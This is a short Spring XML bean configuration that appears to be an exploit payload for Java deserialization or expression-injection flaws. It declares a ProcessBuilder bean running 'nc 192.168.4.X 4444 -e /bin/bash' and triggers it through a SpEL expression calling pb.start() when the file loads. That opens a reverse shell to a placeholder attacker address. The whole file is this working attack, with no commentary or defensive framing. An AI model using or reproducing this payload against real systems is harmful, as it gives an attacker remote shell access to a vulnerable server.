<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
      http://www.springframework.org/schema/beans
      http://www.springframework.org/schema/beans/spring-beans.xsd">
   <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>nc</value>
                <value>192.168.4.X</value>
                <value>4444</value>
                <value>-e</value>
                <value>/bin/bash</value>
            </array>
        </constructor-arg>
      <property name="whatever" value="#{ pb.start() }"/>
   </bean>
 </beans>
